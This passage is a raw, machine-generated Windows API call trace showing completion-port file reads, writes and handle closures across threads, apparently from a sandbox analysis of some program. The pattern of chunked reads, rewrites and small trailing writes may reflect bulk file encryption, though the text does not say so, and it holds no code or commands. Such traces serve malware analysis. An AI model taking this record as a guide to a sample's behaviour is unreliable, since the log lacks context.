lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0157.141] WriteFile (in: hFile=0x61c, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x14f46, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x41f0020) returned 1 [0157.141] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0157.141] WriteFile (in: hFile=0x1c, lpBuffer=0x4670124*, nNumberOfBytesToWrite=0xa9f8, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4670020) returned 1 [0157.142] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0157.142] ReadFile (in: hFile=0x640, lpBuffer=0x2910124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x2910020 | out: lpBuffer=0x2910124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x2910020) returned 0x0 [0157.142] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0157.142] ReadFile (in: hFile=0x61c, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x41f0020) returned 0x0 [0157.142] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0157.142] ReadFile (in: hFile=0x1c, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3e9fe88, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124, lpNumberOfBytesRead=0x3e9fe88*=0x0, lpOverlapped=0x4670020) returned 0x0 [0157.142] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0157.142] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2910020) returned 1 [0157.142] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0157.142] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0157.142] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 0 [0157.142] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0157.142] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0157.142] WriteFile (in: hFile=0x640, lpBuffer=0x2910094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2910020 | out: lpBuffer=0x2910094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x2910020) returned 1 [0157.142] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0157.142] WriteFile (in: hFile=0x61c, lpBuffer=0x41f0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x41f0020) returned 1 [0157.143] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0157.143] WriteFile (in: hFile=0x1c, lpBuffer=0x4670094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4670020 | out: lpBuffer=0x4670094*, lpNumberOfBytesWritten=0x3e9fe88, lpOverlapped=0x4670020) returned 1 [0157.143] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0157.143] CloseHandle (hObject=0x640) returned 1 [0157.144] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2910020) returned 1 [0157.144] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0157.144] CloseHandle (hObject=0x61c) returned 1 [0157.145] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x41f0020) returned 1 [0157.145] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 [0157.146] CloseHandle (hObject=0x1c) returned 1 [0157.146] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4670020) returned 1 [0157.147] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3e9fe88, lpCompletionKey=0x3e9fe84, lpOverlapped=0x3e9fe8c) returned 1 Thread: id = 128 os_tid = 0x99c [0136.131] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0147.572] ReadFile (in: hFile=0x61c, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4670020) returned 1 [0147.572] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0147.572] ReadFile (in: hFile=0x654, lpBuffer=0x4790124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4790020) returned 1 [0147.572] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0147.667] WriteFile (in: hFile=0x65c, lpBuffer=0x41f0124, nNumberOfBytesToWrite=0x10b1e, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x41f0020) returned 0x0 [0147.691] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0147.691] WriteFile (in: hFile=0x61c, lpBuffer=0x4670124*, nNumberOfBytesToWrite=0x499, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4670020) returned 1 [0147.715] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0147.715] ReadFile (in: hFile=0x628, lpBuffer=0x4940124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4940020 | out: lpBuffer=0x4940124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4940020) returned 1 [0147.716] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0147.716] ReadFile (in: hFile=0x620, lpBuffer=0x4a60124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4a60020) returned 1 [0147.716] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0147.716] WriteFile (in: hFile=0x660, lpBuffer=0x4280124*, nNumberOfBytesToWrite=0xec38, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4280020) returned 1 [0147.723] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0147.723] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0147.723] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0147.723] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0147.723] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0147.723] ReadFile (in: hFile=0x654, lpBuffer=0x4790124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4790020) returned 0x0 [0147.723] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0147.723] ReadFile (in: hFile=0x660, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4280020) returned 0x0 [0147.723] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0147.723] WriteFile (in: hFile=0x65c, lpBuffer=0x41f0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x41f0020) returned 1 [0147.733] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0147.733] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4820020) returned 1 [0147.733] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0147.733] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4940020) returned 1 [0147.733] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0147.733] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4a60020) returned 1 [0147.733] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0147.733] CloseHandle (hObject=0x65c) returned 1 [0147.748] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x41f0020) returned 1 [0147.748] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0147.751] WriteFile (in: hFile=0x620, lpBuffer=0x4a60094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4a60020) returned 1 [0147.756] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0147.762] CloseHandle (hObject=0x628) returned 1 [0147.770] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4940020) returned 1 [0147.771] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0148.013] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0148.013] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0148.016] ReadFile (in: hFile=0x648, lpBuffer=0x4820124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4820020 | out: lpBuffer=0x4820124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4820020) returned 0x0 [0148.016] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0148.018] WriteFile (in: hFile=0x61c, lpBuffer=0x4700094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4700020 | out: lpBuffer=0x4700094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4700020) returned 1 [0148.029] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0148.048] CloseHandle (hObject=0x628) returned 1 [0148.063] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4280020) returned 1 [0148.063] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.057] CloseHandle (hObject=0x634) returned 1 [0149.067] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4a60020) returned 1 [0149.067] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0149.067] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0149.067] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.067] WriteFile (in: hFile=0x630, lpBuffer=0x41f0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x41f0020) returned 1 [0149.070] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.070] CloseHandle (hObject=0x630) returned 1 [0149.071] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x41f0020) returned 1 [0149.072] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.176] ReadFile (in: hFile=0x630, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x2f30020) returned 1 [0149.347] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.348] ReadFile (in: hFile=0x638, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4280020) returned 1 [0149.348] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.349] ReadFile (in: hFile=0x1a8, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4700020) returned 1 [0149.473] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.473] ReadFile (in: hFile=0x368, lpBuffer=0x4820124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4820020 | out: lpBuffer=0x4820124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4820020) returned 1 [0149.473] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.473] ReadFile (in: hFile=0x674, lpBuffer=0x4940124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4940020 | out: lpBuffer=0x4940124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4940020) returned 1 [0149.658] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.658] ReadFile (in: hFile=0x640, lpBuffer=0x4a60124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4a60020) returned 1 [0149.658] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.866] WriteFile (in: hFile=0x630, lpBuffer=0x2f30124, nNumberOfBytesToWrite=0x17d3b, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x2f30020) returned 0x0 [0149.866] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.867] WriteFile (in: hFile=0x638, lpBuffer=0x4280124, nNumberOfBytesToWrite=0x4b51, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4280020) returned 0x0 [0149.867] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0149.867] ReadFile (in: hFile=0x670, lpBuffer=0x4b80124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4b80020 | out: lpBuffer=0x4b80124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4b80020) returned 1 [0149.867] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, 